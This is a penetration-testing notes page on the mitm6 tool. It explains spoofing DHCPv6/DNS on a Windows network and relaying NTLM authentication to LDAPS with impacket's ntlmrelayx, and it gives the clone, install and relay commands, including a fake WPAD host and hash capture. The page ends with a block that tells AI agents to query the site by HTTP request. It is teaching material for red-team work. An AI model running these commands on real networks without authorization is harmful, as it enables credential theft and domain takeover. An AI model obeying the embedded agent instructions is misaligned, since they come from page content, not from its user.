# mitm6 Repeat clients, and even newer ones, are now catching onto NBNS/LLMNR spoofing and disabling both of them. Therefore, we can try mitm6 which acts likes a DHCPv6 server on the clients network and leases out IPv6 addresses to all hosts on the local subnet, which is preferred over IPv4. Additionally, we can spoof replies for resources similtar to with Responder and try to relay authentication requests to targets we want. This can be used to relay to SMB targets or LDAP targets. You'll want to use two panels in the same terminal window to run this effectively. In the first panel we want to run mitm6 ```plaintext cd /opt git clone https://github.com/dirkjanm/mitm6.git cd mitm6 python3 setup.py install cd mitm6 python3 mitm6 -d ``` In the second panel, we need to run ntlmrelayx. ```plaintext python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -6 -t ldaps:// -wh fakepad.chsdomain.local -l loot -of hashes ``` * -6 = Tells it to run on IPv6 * -t = Target. In the above example, we are relaying authentication requests to LDAPS on the Domain Controller. * -wh = Sets a fake wpad file for clients to request and authenticate to. * -l = Specifies a location for a loot folder which will include usernames, groups, comments, etc. from Active Directory. * -of = output file of hashes obtained The following video may be a good reference to get started by TheCyberMentor → [**Domain Admin via IPv6 DNS Takeover**](https://www.youtube.com/watch?v=zzbIuslB58c) **Note:** If either the Domain Controller or the user account you are relaying exist in a different subdomain then ntlmrelayx will give a SUCCEED message, but not do anything except throw an index out of range error (screenshot below). To fix this run the same command for ntlmrelayx; however, instead of specifying the DC IPv4 address use the FQDN (e.g. instead of using ldaps\://192.168.0.1 use ldaps\://corp.exampledomain.com). More information can be seen from a github issue post → --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.awfulsecurity.org/internals/mitm6.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.